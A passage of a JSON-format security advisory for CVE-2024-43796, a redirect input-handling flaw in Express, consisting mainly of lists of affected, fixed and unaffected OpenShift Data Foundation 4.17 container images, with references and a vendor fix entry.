"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311152"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express: Improper Input Handling in Express Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43796"
},
{
"category": "external",
"summary": "RHBZ#2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553",
"url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx",
"url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx"
}
],
"release_date": "2024-09-10T15:15:17.510000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
